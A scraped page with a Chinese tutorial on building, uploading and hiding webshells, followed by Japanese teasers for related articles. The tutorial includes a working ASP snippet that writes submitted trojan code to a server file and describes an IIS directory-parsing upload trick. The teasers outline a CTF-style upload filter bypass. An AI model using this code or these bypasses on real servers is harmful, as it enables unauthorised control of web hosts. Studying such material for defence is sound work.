Webshell实现与隐藏探究,webshell实现探究
Webshell实现与隐藏探究,webshell实现探究
一、什么是webshell
webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理 工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于 webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被 黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,然后通过页面访问的形式进行入侵,或者通过插入一句话 连接本地的一些相关工具直接对服务器进行入侵操作。
webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。 根据功能也分为大马与小马,小马通常指的一句话木马,例如:通常把这句话写入一个文档里面,然后文件名改成xx.asp。然后传到服务器上面。这里eval方法将 request(“pass”)转换成代码执行,request函数的作用是应用外部文件。这相当于一句话木马的客户端配置。服务器配置(即本机配置): Default1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | form action=http://主机路径/TEXT.asp method=post> textarea name=value cols=120 rows=10 width=45> set lP=server.createObject("Adodb.Stream")//建立流对象 lP.Open //打开 lP.Type=2 //以文本方式 lP.CharSet="gb2312" //字体标准 lP.writetext request("newvalue") lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式 lP.Close //关闭对象 set lP=nothing //释放对象 response.redirect "newmm.asp" //转向newmm.asp /textarea> textarea name=newvalue cols=120 rows=10 width=45>(添入生成木马的内容) /textarea> BR> center> br> input type=submit value=提交> |
大马的工作模式简单的多,他没有客户端与服务端的区别,就是一些脚本大牛直接把一句话木马的服务端整合到了一起,通过上传漏洞将大马上传,然后复制 该大马的url地址直接访问,在页面上执行对web服务器的渗透工作。但是有些网站对上传文件做了严格的限制,因为大马的功能较多,所以体积相对较大,很 有可能超出了网站上传限制,但是小马的体积可以控制(比如把代码复制很多遍,或者在一个乱码文件中夹入代码),但是小马操作起来比较繁琐,可以先上传小马 拿到webshell,然后通过小马的连接上传大马拿到服务器。
二、如何上传webshell
1.解析漏洞上传
现在对于不同的web服务器系统对应的有不同的web服务端程序,windows端主流的有iis,linux端主流的有nginx。这些服务对搭建web服务器提供了很大的帮助,同样也对服务器带来隐患,这些服务器上都存在一些漏洞,很容易被黑客利用。(1)iis目录解析漏洞
比如:/xx.asp/xx.jpg 虽然上传的是JPG文件,但是如果该文件在xx.asp文件夹下,那个iis会把这个图片文件当成xx.asp解析,这个漏洞存在于iis5.x/6.0版本。(2)文件解析漏洞

ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

人気の記事

ホットツール

メモ帳++7.3.1
使いやすく無料のコードエディター

SublimeText3 中国語版
中国語版、とても使いやすい

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

ドリームウィーバー CS6
ビジュアル Web 開発ツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

ホットトピック











シナリオの説明では、実際の運用環境に RCE 脆弱性が存在し、WebShell 環境のインストールを取得できることを前提としています。まず、GetHub で脆弱なイメージを取得する前に、事前に nginx と Tomcat を centos にインストールする必要があります。 nginx と tomcat 構成ファイルを構成し、docker を使用してイメージをプルダウンし、脆弱性を再現します。 1. まず docker 環境をセットアップします 2. tomcat にアクセスできるかテストします 上図からわかるように、バックエンドの tomcat にアクセスできます 3. docker で nginx リバース プロキシの負荷分散を確認します 4. docker の lbsnode1 の ant を確認してください。.jsp テキスト

1. URLを開いたところ、アップロードページであることが判明 2. 接尾辞phpのファイルを直接アップロードしたが、アップロードできないことが判明 3. BurpSuiteを使用してパケットをキャプチャし、接尾辞を変更アップロードしたファイルのサフィックス php を php5 に変更してバイパスします 4. 包丁を使って接続します var/www/html のディレクトリに KEY が付いたファイルがありますので開くと key5 が表示されます 開く別の URL (アップロード ページでもありますが、アップロード リストが設定されています) 接尾辞 .gif.jpg.png を持つファイルのみをアップロードします 6. txt 一文のトロイの木馬を作成し、その接尾辞を jpg7 に変更します。アップロード時に、BurpSiuitを使用してパケットをキャプチャし、表示するようにファイルのサフィックスを変更します。

インターネットのセキュリティ問題がますます顕著になるにつれ、主要な Web サイトやアプリケーションのセキュリティがますます重要な問題になっています。特にWebサイトの運用・保守管理においては、保守や修復のためにWebShellなどのツールが必要になることが多いですが、WebShellはハッカーによっても利用されることが多く、攻撃者の侵入口となってしまいます。この記事では、Web サイト管理者がサイトのセキュリティを向上させるのに役立つ、Pagoda パネルの WebShell セキュリティ設定を紹介します。 1. WebShell の概念と一般的な使用法 1. WebShell の概念は次のとおりです。

ローカル環境構築 保存されているスクリーンショットから判断すると、相手のPHPバージョンは5.6.40なので、apache+php5.6.40のテスト環境を構築したいと思います。 virtualbox を開き、centos イメージ システムへのリンクをコピーし、次の手順に従って設定します。 1.apacheyuminstall-yhttpdhttpd-vServerversion:Apache/2.4.6(CentOS)Serverbuilt:Aug8201911:41:182をインストールします。php5.6yum-yinstallepel-releaserpm-Uvhをインストールしますhttps://mi

この記事では、Empire CMS フレームワークの Webshell について紹介します。一定の参考値があるので、困っている友達が参考になれば幸いです。

SINE Security は、顧客の Web サイトで Web サイトの脆弱性の検出と修復を実施していたところ、その Web サイトに重大な SQL インジェクションの脆弱性と、アップロードされた Web シェル Web サイトのトロイの木馬ファイルの脆弱性があることが判明しました。この Web サイトは、PHP 言語で開発され、mysql データベース アーキテクチャを備えた CMS システムを使用していました。このウェブサイトのソースコードは現在オープンソースです。あるCMSは、ナレッジの有料提供に特化したソーシャルCMSシステムです 現在のインターネット上でナレッジに対する支払いの需要が高まっています ドキュメントを共有し、有料でダウンロードできるシステムです ユーザーが公開したナレッジコンテンツを非表示にして提供することができます有料のお客様へお読みください。コードは比較的合理化されており、大多数の Web マスターに好まれています。この Web サイトの脆弱性は主に、圧縮パッケージをアップロードし、zip パッケージ内の w を参照する悪意のある解凍コードを構築するときに発生します。

Webシェルとは何ですか?当初、Webshell は、Web サーバー管理者がサーバーをリモートで管理するために使用するスクリプトの一種の略語としてよく使用されていました。その後、いくつかの Webshell 管理ツールの誕生により、Web 権限を取得するプロセスが大幅に簡素化されたため、徐々に Web 侵入ツール スクリプトと呼ばれるようになりました。 WebShell は脆弱性とは異なりますが、アプリケーションの脆弱性やサーバーの脆弱性 (ファイル アップロードの脆弱性、ファイル インクルードの脆弱性など) を利用してスクリプト ファイルをサーバーにアップロードし、後続の悪用を行うものであり、侵入テストの後続悪用や TA0002Execution (実行) に属します。 )ATT&CKのステージ。図1TA0002 参照元:https

まず、私がしなければならないことは、アップロードされた場所がどこに表示されるかを見つけることではなく、サーバーにログオンしてWebシェルの検査を実行し、検査を行って、他人によって侵入されていないかどうかを確認する必要があることを理解しています。バックドアがあるかどうかなど。報告された IP アドレスは当社の IP アドレスですが、いくつかの Web シェルが見逃され、他の人がアップロードに成功したにもかかわらず検出されなかった場合、サーバーが侵入された場合はどうすればよいでしょうか?そこで私はサーバーを調査し、WebShell 強制終了ツールをアップロードして、netstat-anpt と iptables-L を使用してバックドアが確立されているかどうかを確認し、CPU を占有しているマイニング プログラムがあるかどうかを確認しました。ここでは詳細には触れません。幸いなことに、サーバーは侵害されませんでしたが、
